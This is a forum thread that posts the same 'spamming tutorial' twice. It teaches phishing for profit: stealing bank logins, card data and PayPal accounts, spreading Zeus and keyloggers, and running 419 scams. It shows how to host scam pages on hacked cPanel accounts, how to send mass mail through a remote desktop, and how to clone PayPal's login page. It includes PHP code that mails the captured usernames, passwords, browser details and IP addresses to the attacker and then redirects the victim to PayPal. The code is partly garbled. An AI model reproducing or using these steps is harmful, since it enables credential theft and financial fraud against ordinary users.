EBook/Course - SPAMMING TUTORIAL | SpamTube | Crax

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Jan 9, 2021

Hello guys this is tutorial in depth of the topic spamming.
First of we will see what do we mean by term spamming.
Wikipedia definition:
Email spam, also known as unsolicited bulk Email
(UBE), junk mail, or unsolicited commercial email
(UCE), is the practice of sending unwanted email
messages, frequently with commercial content, in
large quantities to an indiscriminate set of recipients.
In simple language spamming means to send bulk
mails to people in order to flood there mails or to
make them fool and make some real $C@sh^.
Why we spam?
1.To get Bank Logs by spamming different banks.
2.To get cc,fullz.
3.To get Accounts like paypals,dating sites etc.
4.To spread our malware like zeus,keyloggers etc.
5.To spam lottery scam aka 419 scams.
There are endless reasons to spam but these
were some of common reasons for spamming.
Now we learned what is spamming and why we
spam or for what purpose we spam lets learn
how to spam 
Before we learn how to spam we need to know
the meaning of general terms:
1.Leads: Leads is the term used to refer to email
list, its basically another name for the common
term email list. Leads aka email list is list of
email addresses of people we are going to
2.AMS(Advanced Mass Sender): It is a windows
based tool which we used to spam, here we add
our SMTP, load our email list aka leads, add
email from which mail will be delivered for
example if we are spamming chase bank we
add email of chase bank like no-
[email protected] and add our scam letter.
3.Scam Pages: Scam pages is another name of
the Phishing page, its basically a replication of
the original page. Its used to get logs from our
4.Scam letter: Scam letter aka fake mail is the
name given to a email which is replica of original
mail, here we tweak the original mail and edit
asking victim to login to our scam page and we
will get his logs.
5.PHP mailer: PHP mailer is a script which is used
to spam our leads, this is another method of
spamming. In this we don’t use AMS tool, we
spam via this PHP script.
6.Cpanel: Cpanel is is the hosting panel of a
website, in simple language it’s a panel from
where a admin of a particular site manages
his/her website. We use cpanel to host our scam
Now question arises why we don’t used our own
cpanel host to host our scam page?
The answer is simple hosting websites don’t
allow scam pages on there servers so we used
hacked cpanels to host our pages.
7.SMTP (Simple mail Transfer Protocol): SMTP is
generally an application which runs on a server
which is used to transmit and receive emails, in
simple language we use SMTP to send our
mails to our victims.

Methods of Spamming?

There are two ways of spamming:
Spamming Via SMTP and AMS.
 Spamming Via PHP Mailer.
This method is divided into 2 parts.
 First part is scam page uploading via cpanel.
 Second part is loading leads to AMS, adding
SMTP and start our spam 
PART1: scam page uploading via cpanel
1. First of login to Cpanel.
Now click on file manager and
4. Now click on new folder and make a new folder
named site and double click on the dir created
Now Click on upload:
6. Now make a Zip File of your scampage and
upload via this uploader.
7. Now go back to your main cpanel page and
refresh page and select file and click extract:
8. Now we need to edit a php file where we need
to enter our email id where scam page will send
logs, its different in all case in my case its
l0gx.php (Select file and click edit):
At the place of $send = "[email protected]";
Add your mail.
Now after you have followed all the steps we will
check that our page is working or not.
If your cpanel website is abc.com then you will
access scam page from www.abc.com/site/


We successfully uploaded our scam page, now
we will move on to second part of this method.
loading leads to AMS, adding SMTP and start our
NOTE: Spamming is illegal as per laws so we should
not spam from our own system.
For spamming we should use RDP.
1.First connect to your RDP for that go to
Start>All Programs> Accessories>Communications> Remote
Desktop Connection
2. Add your RDP IP
3. You Will see box asking username and
password, enter your username and password
and you will get access to RDP.
4. Now open AMS, if you have rdp without AMS
then you can intall AMS yourself on rdp.
5. First we will add a account on AMS:
Click on Sender Accounts>Add/Edit Sender
Account>Add your details>Click on add account
6.After this click on Return to main window.
7.Now Click on add>Add Server IP>Select Use
authentication>Add Username>Add
Password>Press OK
8.Now Click on Mailing List>Add Group>Enter
Group Name>Double Click on Group
Name>Load Mail List>Select file Now our leads
are loaded.
9.Now Add Subject of your scam letter, suppose
we are spamming chase then add subject of
chase spam letter.
10. Add your scam letter into msg body and
select html from message type.
11. Now CLICK SEND!!!
You will see AMS sending mails to your victims.

Finally, all you need to do is wait for your results to come and make your fat cash outs.


Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used
for this scam.

1] OK, so first we choose a target.
We chose www.paypal.com

2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.

3] We open ... There might be a problem, namely the way the image.

4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)

5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).

6] You have a code like <form action="login2.php">. Login2.php change in 040147.php!

7] Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.

8] Good memory.
The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.

9] Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:

$ To = "[email protected]"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;

mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");


10] Modify code

$ To = "[email protected]"

and put your mail. The code above variables over email and password and sends them together with some more useful details.

11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:

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Reactions: Bc0d3r, desmondgads, Dilangramajo123 and 3 others


Sep 21, 2021

Hello guys this is tutorial in depth of the topic spamming.
First of we will see what do we mean by term spamming.
Wikipedia definition:
Email spam, also known as unsolicited bulk Email
(UBE), junk mail, or unsolicited commercial email
(UCE), is the practice of sending unwanted email
messages, frequently with commercial content, in
large quantities to an indiscriminate set of recipients.
In simple language spamming means to send bulk
mails to people in order to flood there mails or to
make them fool and make some real $C@sh^.
Why we spam?
1.To get Bank Logs by spamming different banks.
2.To get cc,fullz.
3.To get Accounts like paypals,dating sites etc.
4.To spread our malware like zeus,keyloggers etc.
5.To spam lottery scam aka 419 scams.
There are endless reasons to spam but these
were some of common reasons for spamming.
Now we learned what is spamming and why we
spam or for what purpose we spam lets learn
how to spam 
Before we learn how to spam we need to know
the meaning of general terms:
1.Leads: Leads is the term used to refer to email
list, its basically another name for the common
term email list. Leads aka email list is list of
email addresses of people we are going to
2.AMS(Advanced Mass Sender): It is a windows
based tool which we used to spam, here we add
our SMTP, load our email list aka leads, add
email from which mail will be delivered for
example if we are spamming chase bank we
add email of chase bank like no-
[email protected] and add our scam letter.
3.Scam Pages: Scam pages is another name of
the Phishing page, its basically a replication of
the original page. Its used to get logs from our
4.Scam letter: Scam letter aka fake mail is the
name given to a email which is replica of original
mail, here we tweak the original mail and edit
asking victim to login to our scam page and we
will get his logs.
5.PHP mailer: PHP mailer is a script which is used
to spam our leads, this is another method of
spamming. In this we don’t use AMS tool, we
spam via this PHP script.
6.Cpanel: Cpanel is is the hosting panel of a
website, in simple language it’s a panel from
where a admin of a particular site manages
his/her website. We use cpanel to host our scam
Now question arises why we don’t used our own
cpanel host to host our scam page?
The answer is simple hosting websites don’t
allow scam pages on there servers so we used
hacked cpanels to host our pages.
7.SMTP (Simple mail Transfer Protocol): SMTP is
generally an application which runs on a server
which is used to transmit and receive emails, in
simple language we use SMTP to send our
mails to our victims.

Methods of Spamming?

There are two ways of spamming:
Spamming Via SMTP and AMS.
 Spamming Via PHP Mailer.
This method is divided into 2 parts.
 First part is scam page uploading via cpanel.
 Second part is loading leads to AMS, adding
SMTP and start our spam 
PART1: scam page uploading via cpanel
1. First of login to Cpanel.
Now click on file manager and
4. Now click on new folder and make a new folder
named site and double click on the dir created
Now Click on upload:
6. Now make a Zip File of your scampage and
upload via this uploader.
7. Now go back to your main cpanel page and
refresh page and select file and click extract:
8. Now we need to edit a php file where we need
to enter our email id where scam page will send
logs, its different in all case in my case its
l0gx.php (Select file and click edit):
At the place of $send = "[email protected]";
Add your mail.
Now after you have followed all the steps we will
check that our page is working or not.
If your cpanel website is abc.com then you will
access scam page from www.abc.com/site/


We successfully uploaded our scam page, now
we will move on to second part of this method.
loading leads to AMS, adding SMTP and start our
NOTE: Spamming is illegal as per laws so we should
not spam from our own system.
For spamming we should use RDP.
1.First connect to your RDP for that go to
Start>All Programs> Accessories>Communications> Remote
Desktop Connection
2. Add your RDP IP
3. You Will see box asking username and
password, enter your username and password
and you will get access to RDP.
4. Now open AMS, if you have rdp without AMS
then you can intall AMS yourself on rdp.
5. First we will add a account on AMS:
Click on Sender Accounts>Add/Edit Sender
Account>Add your details>Click on add account
6.After this click on Return to main window.
7.Now Click on add>Add Server IP>Select Use
authentication>Add Username>Add
Password>Press OK
8.Now Click on Mailing List>Add Group>Enter
Group Name>Double Click on Group
Name>Load Mail List>Select file Now our leads
are loaded.
9.Now Add Subject of your scam letter, suppose
we are spamming chase then add subject of
chase spam letter.
10. Add your scam letter into msg body and
select html from message type.
11. Now CLICK SEND!!!
You will see AMS sending mails to your victims.

Finally, all you need to do is wait for your results to come and make your fat cash outs.


Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used
for this scam.

1] OK, so first we choose a target.
We chose www.paypal.com

2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.

3] We open ... There might be a problem, namely the way the image.

4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)

5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).

6] You have a code like <form action="login2.php">. Login2.php change in 040147.php!

7] Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.

8] Good memory.
The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.

9] Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:

$ To = "[email protected]"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;

mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");


10] Modify code

$ To = "[email protected]"

and put your mail. The code above variables over email and password and sends them together with some more useful details.

11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:


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